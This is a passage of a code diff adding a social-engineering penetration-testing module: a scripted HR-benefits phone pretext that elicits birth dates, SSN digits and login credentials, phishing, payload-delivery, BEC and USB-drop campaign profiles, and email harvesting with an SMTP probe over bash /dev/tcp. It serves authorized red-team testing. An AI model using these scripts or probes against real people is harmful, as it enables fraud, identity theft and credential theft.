+            content: "I'm reaching out because our records show your benefits enrollment may be incomplete, and the deadline is [date]. I wanted to make sure you don't lose your coverage.",
+            notes: "Create urgency around deadline",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target has time",
+            nextPhase: "Verification",
+          },
+          {
+            condition: "Target is busy",
+            nextPhase: "Schedule Callback",
+          },
+        ],
+        duration: "30-60 seconds",
+      },
+      {
+        name: "Verification",
+        objective: "Gather identifying information",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "For security purposes, I need to verify your identity before we discuss your benefits. Can you confirm your date of birth?",
+          },
+          {
+            speaker: "target",
+            type: "response",
+            content: "[Provides DOB]",
+          },
+          {
+            speaker: "caller",
+            type: "question",
+            content: "And the last four digits of your Social Security number?",
+            notes: "May or may not get SSN - have fallback ready",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target provides information",
+            nextPhase: "Benefits Discussion",
+          },
+          {
+            condition: "Target refuses SSN",
+            nextPhase: "Alternative Verification",
+          },
+        ],
+        duration: "1-2 minutes",
+      },
+      {
+        name: "Alternative Verification",
+        objective: "Use alternative verification if SSN refused",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "No problem, I understand. Let me verify using your employee information instead. Can you confirm your employee ID number?",
+            alternatives: [
+              "That's fine. Let me use your home address instead for verification.",
+            ],
+          },
+        ],
+        transitions: [
+          {
+            condition: "Verification successful",
+            nextPhase: "Benefits Discussion",
+          },
+        ],
+        duration: "1 minute",
+      },
+      {
+        name: "Benefits Discussion",
+        objective: "Build rapport and gather more information",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "I can see your current elections. You have [health plan] for health insurance and [401k amount] going to your 401k. Does that look correct?",
+            notes: "Use general terms if you don't know specifics",
+          },
+          {
+            speaker: "caller",
+            type: "question",
+            content: "Are you planning any life changes this year? Marriage, new baby, buying a house? Those might affect your benefit needs.",
+            notes: "Gather personal intelligence",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target engaged",
+            nextPhase: "Portal Access",
+          },
+        ],
+        duration: "2-3 minutes",
+      },
+      {
+        name: "Portal Access",
+        objective: "Get target to access portal or provide credentials",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "I can update these elections for you, or you can do it yourself through the benefits portal. Do you have access to the portal?",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Let me send you a direct link to log in and make changes. You should receive an email from hr-benefits@[domain] in a moment.",
+          },
+          {
+            speaker: "caller",
+            type: "instruction",
+            content: "Once you click the link, log in with your regular company credentials and you should see your benefits dashboard.",
+          },
+        ],
+        transitions: [
+          {
+            condition: "Target clicks link",
+            nextPhase: "Closing",
+          },
+        ],
+        duration: "2-3 minutes",
+      },
+      {
+        name: "Closing",
+        objective: "End call professionally",
+        dialogue: [
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "You should be all set. If you have any questions about your benefits, feel free to call the HR hotline or email benefits@[company].com.",
+          },
+          {
+            speaker: "caller",
+            type: "statement",
+            content: "Thanks for taking the time to get this sorted. Have a great rest of your day!",
+          },
+        ],
+        transitions: [],
+        duration: "30 seconds",
+      },
+    ],
+    objectionHandlers: [
+      {
+        objection: "I already completed enrollment",
+        responses: [
+          "Let me check... You're right, I see it was submitted on [date]. There might have been a system sync issue. Let me verify everything is correct.",
+          "Our system may not have updated yet. Can you confirm when you submitted? I want to make sure nothing was lost.",
+        ],
+      },
+      {
+        objection: "Why do you need my SSN?",
+        responses: [
+          "It's a standard verification procedure to protect your benefits information. I can use your employee ID instead if you prefer.",
+          "For your protection, we verify identity before discussing benefits. I understand the concern - let me use alternative verification.",
+        ],
+      },
+    ],
+    successCriteria: [
+      "Obtained personal information (DOB, SSN digits)",
+      "Target clicked portal link",
+      "Target provided credentials",
+      "Gathered life event intelligence",
+    ],
+    notes: [
+      "Benefits enrollment periods vary by company - research timing",
+      "Have general knowledge of common benefit types",
+      "Be prepared to discuss 401k, health insurance, FSA/HSA",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * All built-in scripts.
+   */
+  export const ALL_SCRIPTS: CallScript[] = [
+    IT_PASSWORD_RESET_SCRIPT,
+    HR_BENEFITS_SCRIPT,
+  ]
+
+  // ========== Script Operations ==========
+
+  /**
+   * Get all scripts.
+   */
+  export function getScripts(): CallScript[] {
+    return ALL_SCRIPTS
+  }
+
+  /**
+   * Get script by ID.
+   */
+  export function getScript(scriptId: string): CallScript | undefined {
+    return ALL_SCRIPTS.find((s) => s.id === scriptId)
+  }
+
+  /**
+   * Get scripts by persona.
+   */
+  export function getByPersona(personaId: string): CallScript[] {
+    return ALL_SCRIPTS.filter((s) => s.persona === personaId)
+  }
+
+  // ========== Script Generation ==========
+
+  /**
+   * Generate custom script from template.
+   */
+  export function generateScript(options: {
+    name: string
+    persona: string
+    objective: string
+    phases: ScriptPhase[]
+  }): CallScript {
+    return {
+      id: SocEngStorage.createScriptId(),
+      name: options.name,
+      description: `Custom script for ${options.objective}`,
+      persona: options.persona,
+      objective: options.objective,
+      phases: options.phases,
+      objectionHandlers: [],
+      successCriteria: [],
+      notes: [],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Script Customization ==========
+
+  /**
+   * Customize script for target.
+   */
+  export function customizeForTarget(
+    script: CallScript,
+    target: {
+      name: string
+      department?: string
+      manager?: string
+      email?: string
+    }
+  ): CallScript {
+    const customized = JSON.parse(JSON.stringify(script)) as CallScript
+    customized.id = SocEngStorage.createScriptId()
+    customized.createdAt = Date.now()
+
+    // Replace placeholders in dialogue
+    for (const phase of customized.phases) {
+      for (const line of phase.dialogue) {
+        line.content = line.content
+          .replace(/\[Target Name\]/g, target.name)
+          .replace(/\[Department\]/g, target.department || "[Department]")
+          .replace(/\[Manager Name\]/g, target.manager || "[Manager]")
+
+        if (line.alternatives) {
+          line.alternatives = line.alternatives.map((alt) =>
+            alt
+              .replace(/\[Target Name\]/g, target.name)
+              .replace(/\[Department\]/g, target.department || "[Department]")
+              .replace(/\[Manager Name\]/g, target.manager || "[Manager]")
+          )
+        }
+      }
+    }
+
+    return customized
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format script for display.
+   */
+  export function formatScript(script: CallScript): string {
+    const lines: string[] = []
+
+    lines.push(`Call Script: ${script.name}`)
+    lines.push("=".repeat(60))
+    lines.push("")
+    lines.push(`Persona: ${script.persona}`)
+    lines.push(`Objective: ${script.objective}`)
+    lines.push("")
+
+    for (const phase of script.phases) {
+      lines.push(`--- ${phase.name.toUpperCase()} ---`)
+      lines.push(`Goal: ${phase.objective}`)
+      lines.push(`Duration: ${phase.duration}`)
+      lines.push("")
+
+      for (const line of phase.dialogue) {
+        const speaker = line.speaker === "caller" ? "CALLER" : "TARGET"
+        lines.push(`[${speaker}] ${line.content}`)
+        if (line.notes) {
+          lines.push(`        Note: ${line.notes}`)
+        }
+        lines.push("")
+      }
+
+      if (phase.transitions.length > 0) {
+        lines.push("Transitions:")
+        for (const trans of phase.transitions) {
+          lines.push(`  If "${trans.condition}" → ${trans.nextPhase}`)
+        }
+        lines.push("")
+      }
+    }
+
+    if (script.objectionHandlers.length > 0) {
+      lines.push("--- OBJECTION HANDLERS ---")
+      for (const handler of script.objectionHandlers) {
+        lines.push(`Objection: "${handler.objection}"`)
+        lines.push("Responses:")
+        for (const resp of handler.responses) {
+          lines.push(`  • "${resp}"`)
+        }
+        lines.push("")
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format script list.
+   */
+  export function formatScriptList(): string {
+    const lines: string[] = []
+
+    lines.push("Call Scripts")
+    lines.push("=".repeat(40))
+
+    for (const script of ALL_SCRIPTS) {
+      lines.push("")
+      lines.push(`📞 ${script.name}`)
+      lines.push(`   ID: ${script.id}`)
+      lines.push(`   Persona: ${script.persona}`)
+      lines.push(`   Phases: ${script.phases.length}`)
+      lines.push(`   Objective: ${script.objective}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/profiles.ts b/packages/opencode/src/pentest/soceng/profiles.ts
new file mode 100644
index 00000000000..b5106363caa
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/profiles.ts
@@ -0,0 +1,493 @@
+/**
+ * @fileoverview Social Engineering Profiles
+ *
+ * Campaign profile definitions for social engineering toolkit.
+ *
+ * @module pentest/soceng/profiles
+ */
+
+import { SocEngTypes } from "./types"
+
+/**
+ * Social engineering profiles namespace.
+ */
+export namespace SocEngProfiles {
+  // ========== Campaign Profiles ==========
+
+  /**
+   * Basic awareness test profile.
+   */
+  export const AWARENESS_BASIC: SocEngTypes.CampaignProfile = {
+    name: "awareness-basic",
+    description: "Basic security awareness test with simple phishing email",
+    campaignType: "link-click",
+    difficulty: "basic",
+    templateCategory: "generic",
+    tracking: {
+      trackOpens: true,
+      trackClicks: true,
+      trackSubmissions: false,
+      trackPayloads: false,
+      pixelType: "invisible",
+      clickTracking: "redirect",
+    },
+    includeAwareness: true,
+    recommended: true,
+  }
+
+  /**
+   * Credential harvest profile.
+   */
+  export const CREDENTIAL_HARVEST: SocEngTypes.CampaignProfile = {
+    name: "credential-harvest",
+    description: "Credential harvesting campaign with fake login page",
+    campaignType: "credential-harvest",
+    difficulty: "intermediate",
+    templateCategory: "login",
+    tracking: {
+      trackOpens: true,
+      trackClicks: true,
+      trackSubmissions: true,
+      trackPayloads: false,
+      pixelType: "invisible",
+      clickTracking: "redirect",
+    },
+    includeAwareness: true,
+    recommended: true,
+  }
+
+  /**
+   * Payload delivery profile.
+   */
+  export const PAYLOAD_DELIVERY: SocEngTypes.CampaignProfile = {
+    name: "payload-delivery",
+    description: "Malicious payload delivery via email attachment",
+    campaignType: "payload-delivery",
+    difficulty: "advanced",
+    templateCategory: "document",
+    tracking: {
+      trackOpens: true,
+      trackClicks: true,
+      trackSubmissions: false,
+      trackPayloads: true,
+      pixelType: "invisible",
+      clickTracking: "redirect",
+    },
+    includeAwareness: false,
+    recommended: false,
+  }
+
+  /**
+   * Executive impersonation profile.
+   */
+  export const EXECUTIVE_IMPERSONATION: SocEngTypes.CampaignProfile = {
+    name: "executive-impersonation",
+    description: "CEO/CFO impersonation for BEC testing",
+    campaignType: "data-entry",
+    difficulty: "advanced",
+    templateCategory: "executive",
+    tracking: {
+      trackOpens: true,
+      trackClicks: true,
+      trackSubmissions: true,
+      trackPayloads: false,
+      pixelType: "invisible",
+      clickTracking: "redirect",
+    },
+    includeAwareness: true,
+    recommended: false,
+  }
+
+  /**
+   * Vishing callback profile.
+   */
+  export const VISHING_CALLBACK: SocEngTypes.CampaignProfile = {
+    name: "vishing-callback",
+    description: "Voice phishing callback campaign",
+    campaignType: "callback",
+    difficulty: "advanced",
+    templateCategory: "urgent",
+    tracking: {
+      trackOpens: true,
+      trackClicks: false,
+      trackSubmissions: false,
+      trackPayloads: false,
+      pixelType: "invisible",
+    },
+    includeAwareness: true,
+    recommended: false,
+  }
+
+  /**
+   * USB drop profile.
+   */
+  export const USB_DROP: SocEngTypes.CampaignProfile = {
+    name: "usb-drop",
+    description: "Physical USB drop campaign",
+    campaignType: "usb-drop",
+    difficulty: "advanced",
+    templateCategory: "physical",
+    tracking: {
+      trackOpens: false,
+      trackClicks: false,
+      trackSubmissions: false,
+      trackPayloads: true,
+    },
+    includeAwareness: false,
+    recommended: false,
+  }
+
+  /**
+   * All campaign profiles.
+   */
+  export const PROFILES: Record<string, SocEngTypes.CampaignProfile> = {
+    "awareness-basic": AWARENESS_BASIC,
+    "credential-harvest": CREDENTIAL_HARVEST,
+    "payload-delivery": PAYLOAD_DELIVERY,
+    "executive-impersonation": EXECUTIVE_IMPERSONATION,
+    "vishing-callback": VISHING_CALLBACK,
+    "usb-drop": USB_DROP,
+  }
+
+  /**
+   * Get profile by name.
+   */
+  export function getProfile(name: string): SocEngTypes.CampaignProfile | undefined {
+    return PROFILES[name]
+  }
+
+  /**
+   * Get campaign profile by name (alias for getProfile).
+   */
+  export function getCampaignProfile(name: string): SocEngTypes.CampaignProfile | undefined {
+    return getProfile(name)
+  }
+
+  /**
+   * Campaign profiles list for iteration.
+   */
+  export const CAMPAIGN_PROFILES = [
+    { id: "awareness-basic", ...AWARENESS_BASIC },
+    { id: "credential-harvest", ...CREDENTIAL_HARVEST },
+    { id: "payload-delivery", ...PAYLOAD_DELIVERY },
+    { id: "executive-impersonation", ...EXECUTIVE_IMPERSONATION },
+    { id: "vishing-callback", ...VISHING_CALLBACK },
+    { id: "usb-drop", ...USB_DROP },
+  ]
+
+  /**
+   * List all profiles.
+   */
+  export function listProfiles(): SocEngTypes.CampaignProfile[] {
+    return Object.values(PROFILES)
+  }
+
+  /**
+   * Get recommended profiles.
+   */
+  export function getRecommendedProfiles(): SocEngTypes.CampaignProfile[] {
+    return listProfiles().filter((p) => p.recommended)
+  }
+
+  // ========== Email Template Categories ==========
+
+  /**
+   * Template category definitions.
+   */
+  export const TEMPLATE_CATEGORIES = {
+    generic: {
+      name: "Generic",
+      description: "General purpose phishing templates",
+      examples: ["Package delivery", "Survey request", "Account notification"],
+    },
+    login: {
+      name: "Login/Credential",
+      description: "Templates targeting credential theft",
+      examples: ["Password reset", "Account verification", "MFA setup"],
+    },
+    document: {
+      name: "Document",
+      description: "Templates with malicious attachments",
+      examples: ["Invoice", "Contract", "Report"],
+    },
+    executive: {
+      name: "Executive/BEC",
+      description: "Business Email Compromise templates",
+      examples: ["Wire transfer", "Gift card request", "Urgent action"],
+    },
+    urgent: {
+      name: "Urgent/Time-Sensitive",
+      description: "Templates creating urgency",
+      examples: ["Security alert", "Account suspension", "Legal notice"],
+    },
+    hr: {
+      name: "HR/Benefits",
+      description: "Human resources themed templates",
+      examples: ["Benefits enrollment", "Policy update", "Performance review"],
+    },
+    it: {
+      name: "IT/Technical",
+      description: "IT helpdesk themed templates",
+      examples: ["Password expiry", "Software update", "System maintenance"],
+    },
+    financial: {
+      name: "Financial",
+      description: "Finance and banking templates",
+      examples: ["Payment confirmation", "Invoice", "Tax document"],
+    },
+    social: {
+      name: "Social Media",
+      description: "Social platform themed templates",
+      examples: ["Connection request", "Photo tag", "Message notification"],
+    },
+    seasonal: {
+      name: "Seasonal",
+      description: "Holiday and seasonal templates",
+      examples: ["Holiday bonus", "Tax season", "Black Friday"],
+    },
+  }
+
+  // ========== Pretext Scenario Categories ==========
+
+  /**
+   * Pretext scenario category definitions.
+   */
+  export const PRETEXT_CATEGORIES = {
+    "it-support": {
+      name: "IT Support",
+      description: "IT helpdesk impersonation scenarios",
+      difficulty: "easy",
+      commonObjectives: [
+        "Obtain credentials",
+        "Install remote access",
+        "Gather system information",
+      ],
+    },
+    hr: {
+      name: "Human Resources",
+      description: "HR department impersonation",
+      difficulty: "medium",
+      commonObjectives: [
+        "Collect personal information",
+        "Verify employee data",
+        "Policy compliance check",
+      ],
+    },
+    executive: {
+      name: "Executive",
+      description: "C-level impersonation",
+      difficulty: "hard",
+      commonObjectives: [
+        "Wire transfer authorization",
+        "Sensitive data access",
+        "Vendor payment redirect",
+      ],
+    },
+    vendor: {
+      name: "Vendor/Supplier",
+      description: "Third-party vendor impersonation",
+      difficulty: "medium",
+      commonObjectives: [
+        "Payment information update",
+        "System access request",
+        "Credential verification",
+      ],
+    },
+    delivery: {
+      name: "Delivery",
+      description: "Package delivery scenarios",
+      difficulty: "easy",
+      commonObjectives: [
+        "Physical access",
+        "Credential capture",
+        "Payload delivery",
+      ],
+    },
+    banking: {
+      name: "Banking/Financial",
+      description: "Financial institution impersonation",
+      difficulty: "hard",
+      commonObjectives: [
+        "Account credentials",
+        "Transaction authorization",
+        "Personal data collection",
+      ],
+    },
+    government: {
+      name: "Government",
+      description: "Government agency impersonation",
+      difficulty: "hard",
+      commonObjectives: [
+        "Compliance verification",
+        "Tax information",
+        "Legal intimidation",
+      ],
+    },
+    technical: {
+      name: "Technical Support",
+      description: "Software/hardware support scenarios",
+      difficulty: "medium",
+      commonObjectives: [
+        "Remote access",
+        "Software installation",
+        "System diagnostics",
+      ],
+    },
+  }
+
+  // ========== Payload Profiles ==========
+
+  /**
+   * Payload type profiles.
+   */
+  export const PAYLOAD_PROFILES = {
+    document: {
+      name: "Malicious Document",
+      extensions: [".doc", ".docx", ".xls", ".xlsx", ".pdf"],
+      description: "Office documents with embedded macros or exploits",
+      difficulty: "medium",
+      detectionRisk: "high",
+    },
+    macro: {
+      name: "Macro Payload",
+      extensions: [".docm", ".xlsm", ".pptm"],
+      description: "VBA macro-enabled documents",
+      difficulty: "easy",
+      detectionRisk: "high",
+    },
+    hta: {
+      name: "HTA Application",
+      extensions: [".hta"],
+      description: "HTML Application files",
+      difficulty: "easy",
+      detectionRisk: "medium",
+    },
+    lnk: {
+      name: "Shortcut File",
+      extensions: [".lnk"],
+      description: "Windows shortcut with embedded commands",
+      difficulty: "medium",
+      detectionRisk: "medium",
+    },
+    executable: {
+      name: "Executable",
+      extensions: [".exe", ".scr", ".bat", ".cmd", ".ps1"],
+      description: "Direct executable payloads",
+      difficulty: "hard",
+      detectionRisk: "very_high",
+    },
+    usb: {
+      name: "USB Payload",
+      extensions: [],
+      description: "Physical USB drop payloads",
+      difficulty: "medium",
+      detectionRisk: "low",
+    },
+  }
+
+  // ========== OSINT Profiles ==========
+
+  /**
+   * OSINT reconnaissance profiles.
+   */
+  export const OSINT_PROFILES = {
+    quick: {
+      name: "Quick Recon",
+      description: "Fast reconnaissance with basic information",
+      modules: ["email-harvest", "dns"],
+      duration: "1-5 minutes",
+    },
+    standard: {
+      name: "Standard Recon",
+      description: "Comprehensive reconnaissance",
+      modules: ["email-harvest", "linkedin", "social-media", "dns", "documents"],
+      duration: "10-30 minutes",
+    },
+    thorough: {
+      name: "Thorough Recon",
+      description: "Deep reconnaissance with all available sources",
+      modules: [
+        "email-harvest",
+        "linkedin",
+        "social-media",
+        "dns",
+        "documents",
+        "breaches",
+        "metadata",
+        "org-chart",
+      ],
+      duration: "30-60 minutes",
+    },
+  }
+
+  // ========== Difficulty Descriptions ==========
+
+  /**
+   * Campaign difficulty descriptions.
+   */
+  export const DIFFICULTY_DESCRIPTIONS = {
+    basic: {
+      name: "Basic",
+      description: "Simple campaigns suitable for initial awareness testing",
+      detectability: "Easily detected by trained users",
+      technicalRequirements: "Minimal",
+      recommendedFor: "First-time testing, broad audience",
+    },
+    intermediate: {
+      name: "Intermediate",
+      description: "More sophisticated campaigns with realistic pretexts",
+      detectability: "Moderately detectable",
+      technicalRequirements: "Some technical setup required",
+      recommendedFor: "Regular testing, specific departments",
+    },
+    advanced: {
+      name: "Advanced",
+      description: "Highly targeted campaigns mimicking real threats",
+      detectability: "Difficult to detect without training",
+      technicalRequirements: "Significant technical resources",
+      recommendedFor: "Red team exercises, high-value targets",
+    },
+  }
+
+  // ========== Risk Levels ==========
+
+  /**
+   * Get risk level for campaign type.
+   */
+  export function getCampaignRiskLevel(
+    type: SocEngTypes.CampaignType
+  ): "low" | "medium" | "high" | "critical" {
+    switch (type) {
+      case "link-click":
+      case "awareness-test":
+        return "low"
+      case "data-entry":
+      case "callback":
+        return "medium"
+      case "credential-harvest":
+        return "high"
+      case "payload-delivery":
+      case "usb-drop":
+        return "critical"
+    }
+  }
+
+  /**
+   * Get required authorization level.
+   */
+  export function getRequiredAuthorizationLevel(
+    type: SocEngTypes.CampaignType
+  ): string {
+    const riskLevel = getCampaignRiskLevel(type)
+    switch (riskLevel) {
+      case "low":
+        return "Manager approval"
+      case "medium":
+        return "Security team approval"
+      case "high":
+        return "CISO/Director approval"
+      case "critical":
+        return "Executive/Legal approval required"
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/recon/email.ts b/packages/opencode/src/pentest/soceng/recon/email.ts
new file mode 100644
index 00000000000..1d61b193dee
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/recon/email.ts
@@ -0,0 +1,346 @@
+/**
+ * @fileoverview Email Reconnaissance
+ *
+ * Email address harvesting and enumeration for social engineering.
+ *
+ * @module pentest/soceng/recon/email
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { SocEngEvents } from "../events"
+
+/**
+ * Email reconnaissance namespace.
+ */
+export namespace EmailRecon {
+  // ========== Email Discovery ==========
+
+  /**
+   * Discovered email.
+   */
+  export interface DiscoveredEmail {
+    email: string
+    source: string
+    confidence: "low" | "medium" | "high"
+    verified: boolean
+    firstName?: string
+    lastName?: string
+    title?: string
+    department?: string
+    discoveredAt: number
+  }
+
+  /**
+   * Email pattern.
+   */
+  export interface EmailPattern {
+    pattern: string
+    example: string
+    confidence: number
+  }
+
+  /**
+   * Email enumeration result.
+   */
+  export interface EnumerationResult {
+    domain: string
+    pattern: EmailPattern | null
+    discovered: DiscoveredEmail[]
+    generated: string[]
+    verified: string[]
+    sources: string[]
+    timestamp: number
+  }
+
+  // ========== Email Pattern Detection ==========
+
+  /**
+   * Common email patterns.
+   */
+  export const EMAIL_PATTERNS: EmailPattern[] = [
+    { pattern: "first.last", example: "john.doe@domain.com", confidence: 0.9 },
+    { pattern: "firstlast", example: "johndoe@domain.com", confidence: 0.8 },
+    { pattern: "flast", example: "jdoe@domain.com", confidence: 0.8 },
+    { pattern: "first_last", example: "john_doe@domain.com", confidence: 0.7 },
+    { pattern: "first-last", example: "john-doe@domain.com", confidence: 0.7 },
+    { pattern: "lastfirst", example: "doejohn@domain.com", confidence: 0.6 },
+    { pattern: "last.first", example: "doe.john@domain.com", confidence: 0.6 },
+    { pattern: "first", example: "john@domain.com", confidence: 0.5 },
+    { pattern: "firstl", example: "johnd@domain.com", confidence: 0.5 },
+    { pattern: "f.last", example: "j.doe@domain.com", confidence: 0.7 },
+  ]
+
+  /**
+   * Detect email pattern from known emails.
+   */
+  export function detectPattern(
+    emails: string[],
+    names: Array<{ firstName: string; lastName: string }>
+  ): EmailPattern | null {
+    if (emails.length === 0 || names.length === 0) {
+      return null
+    }
+
+    const patternScores: Record<string, number> = {}
+
+    for (const email of emails) {
+      const [localPart, domain] = email.toLowerCase().split("@")
+      if (!localPart || !domain) continue
+
+      for (const name of names) {
+        const first = name.firstName.toLowerCase()
+        const last = name.lastName.toLowerCase()
+        const fInit = first[0]
+        const lInit = last[0]
+
+        // Check each pattern
+        if (localPart === `${first}.${last}`) {
+          patternScores["first.last"] = (patternScores["first.last"] || 0) + 1
+        } else if (localPart === `${first}${last}`) {
+          patternScores["firstlast"] = (patternScores["firstlast"] || 0) + 1
+        } else if (localPart === `${fInit}${last}`) {
+          patternScores["flast"] = (patternScores["flast"] || 0) + 1
+        } else if (localPart === `${first}_${last}`) {
+          patternScores["first_last"] = (patternScores["first_last"] || 0) + 1
+        } else if (localPart === `${first}-${last}`) {
+          patternScores["first-last"] = (patternScores["first-last"] || 0) + 1
+        } else if (localPart === `${last}${first}`) {
+          patternScores["lastfirst"] = (patternScores["lastfirst"] || 0) + 1
+        } else if (localPart === `${last}.${first}`) {
+          patternScores["last.first"] = (patternScores["last.first"] || 0) + 1
+        } else if (localPart === first) {
+          patternScores["first"] = (patternScores["first"] || 0) + 1
+        } else if (localPart === `${first}${lInit}`) {
+          patternScores["firstl"] = (patternScores["firstl"] || 0) + 1
+        } else if (localPart === `${fInit}.${last}`) {
+          patternScores["f.last"] = (patternScores["f.last"] || 0) + 1
+        }
+      }
+    }
+
+    // Find highest scoring pattern
+    let bestPattern: string | null = null
+    let bestScore = 0
+
+    for (const [pattern, score] of Object.entries(patternScores)) {
+      if (score > bestScore) {
+        bestScore = score
+        bestPattern = pattern
+      }
+    }
+
+    if (bestPattern) {
+      const patternDef = EMAIL_PATTERNS.find((p) => p.pattern === bestPattern)
+      if (patternDef) {
+        return {
+          ...patternDef,
+          confidence: Math.min(1, (bestScore / emails.length) * patternDef.confidence),
+        }
+      }
+    }
+
+    return null
+  }
+
+  // ========== Email Generation ==========
+
+  /**
+   * Generate email based on pattern.
+   */
+  export function generateEmail(
+    firstName: string,
+    lastName: string,
+    domain: string,
+    pattern: string
+  ): string {
+    const first = firstName.toLowerCase().replace(/[^a-z]/g, "")
+    const last = lastName.toLowerCase().replace(/[^a-z]/g, "")
+    const fInit = first[0] || ""
+    const lInit = last[0] || ""
+
+    const generators: Record<string, string> = {
+      "first.last": `${first}.${last}`,
+      "firstlast": `${first}${last}`,
+      "flast": `${fInit}${last}`,
+      "first_last": `${first}_${last}`,
+      "first-last": `${first}-${last}`,
+      "lastfirst": `${last}${first}`,
+      "last.first": `${last}.${first}`,
+      "first": first,
+      "firstl": `${first}${lInit}`,
+      "f.last": `${fInit}.${last}`,
+    }
+
+    const localPart = generators[pattern] || generators["first.last"]
+    return `${localPart}@${domain}`
+  }
+
+  /**
+   * Generate all email permutations.
+   */
+  export function generateAllPermutations(
+    firstName: string,
+    lastName: string,
+    domain: string
+  ): string[] {
+    return EMAIL_PATTERNS.map((p) =>
+      generateEmail(firstName, lastName, domain, p.pattern)
+    )
+  }
+
+  // ========== Email Verification ==========
+
+  /**
+   * Email verification result.
+   */
+  export interface VerificationResult {
+    email: string
+    exists: boolean
+    method: string
+    mxRecords?: string[]
+    smtpResponse?: string
+  }
+
+  /**
+   * Verify email using MX lookup and SMTP.
+   */
+  export async function verifyEmail(
+    email: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; exitCode: number }>
+  ): Promise<VerificationResult> {
+    const [, domain] = email.split("@")
+
+    // Get MX records
+    const mxResult = await execCommand(
+      `dig +short MX ${domain} 2>/dev/null | head -1`
+    )
+    const mxRecord = mxResult.stdout.trim().split(" ").pop()?.replace(/\.$/, "")
+
+    if (!mxRecord) {
+      return {
+        email,
+        exists: false,
+        method: "mx-lookup",
+      }
+    }
+
+    // Note: SMTP verification can be detected and may be blocked
+    // This is a passive check using RCPT TO
+    const smtpCheck = await execCommand(
+      `timeout 5 bash -c 'exec 3<>/dev/tcp/${mxRecord}/25 2>/dev/null && echo "EHLO test.com" >&3 && cat <&3' 2>/dev/null || echo "FAILED"`
+    )
+
+    return {
+      email,
+      exists: smtpCheck.exitCode === 0 && !smtpCheck.stdout.includes("FAILED"),
+      method: "smtp-probe",
+      mxRecords: [mxRecord],
+      smtpResponse: smtpCheck.stdout.substring(0, 200),
+    }
+  }
+
+  // ========== Search Queries ==========
+
+  /**
+   * Generate search queries for email discovery.
+   */
+  export function generateSearchQueries(domain: string): Record<string, string> {
+    return {
+      google: `"@${domain}" email`,
+      googleFiletype: `"@${domain}" filetype:pdf OR filetype:doc OR filetype:xls`,
+      googleSite: `site:${domain} email contact`,
+      linkedin: `site:linkedin.com "@${domain}"`,
+      github: `"@${domain}" site:github.com`,
+      pastebin: `"@${domain}" site:pastebin.com`,
+    }
+  }
+
+  // ========== Email Harvesting ==========
+
+  /**
+   * Parse emails from text content.
+   */
+  export function parseEmailsFromText(text: string, domain?: string): string[] {
+    const emailRegex = /[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/g
+    const matches = text.match(emailRegex) || []
+
+    let emails = [...new Set(matches.map((e) => e.toLowerCase()))]
+
+    if (domain) {
+      emails = emails.filter((e) => e.endsWith(`@${domain.toLowerCase()}`))
+    }
+
+    // Filter out common false positives
+    emails = emails.filter((e) => {
+      const common = [
+        "example.com",
+        "test.com",
+        "domain.com",
+        "email.com",
+        "sample.com",
+      ]
+      return !common.some((c) => e.includes(c))
+    })
+
+    return emails
+  }
+
+  /**
+   * Create enumeration result.
+   */
+  export function createEnumerationResult(
+    domain: string,
+    discovered: DiscoveredEmail[],
+    pattern: EmailPattern | null
+  ): EnumerationResult {
+    return {
+      domain,
+      pattern,
+      discovered,
+      generated: [],
+      verified: [],
+      sources: [...new Set(discovered.map((d) => d.source))],
+      timestamp: Date.now(),
+    }
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format enumeration result.
+   */
+  export function formatResult(result: EnumerationResult): string {
+    const lines: string[] = []
+
+    lines.push(`Email Enumeration: ${result.domain}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    if (result.pattern) {
+      lines.push("Detected Pattern:")
+      lines.push(`  Format: ${result.pattern.pattern}`)
+      lines.push(`  Example: ${result.pattern.example}`)
+      lines.push(`  Confidence: ${Math.round(result.pattern.confidence * 100)}%`)
+      lines.push("")
+    }
+
+    lines.push(`Discovered Emails: ${result.discovered.length}`)
+    for (const email of result.discovered.slice(0, 20)) {
+      const verified = email.verified ? "✓" : "?"
+      lines.push(`  ${verified} ${email.email} (${email.source})`)
+    }
+    if (result.discovered.length > 20) {
+      lines.push(`  ... and ${result.discovered.length - 20} more`)
+    }
+
+    lines.push("")
+    lines.push("Sources:")
+    for (const source of result.sources) {
+      lines.push(`  • ${source}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/recon/index.ts b/packages/opencode/src/pentest/soceng/recon/index.ts
new file mode 100644
index 00000000000..6cc2a1657f6
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/recon/index.ts
@@ -0,0 +1,11 @@
+/**
+ * @fileoverview Reconnaissance Module
+ *
+ * OSINT and reconnaissance for social engineering campaigns.
+ *
+ * @module pentest/soceng/recon
+ */
+
+export { EmailRecon } from "./email"
+export { OrgRecon } from "./organization"
+export { SocialRecon } from "./social"
diff --git a/packages/opencode/src/pentest/soceng/recon/organization.ts b/packages/opencode/src/pentest/soceng/recon/organization.ts
new file mode 100644
index 00000000000..fe97eb12516
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/recon/organization.ts
@@ -0,0 +1,439 @@
+/**
+ * @fileoverview Organization Reconnaissance
+ *
+ * Organization structure mapping and employee enumeration.
+ *
+ * @module pentest/soceng/recon/organization
+ */
+
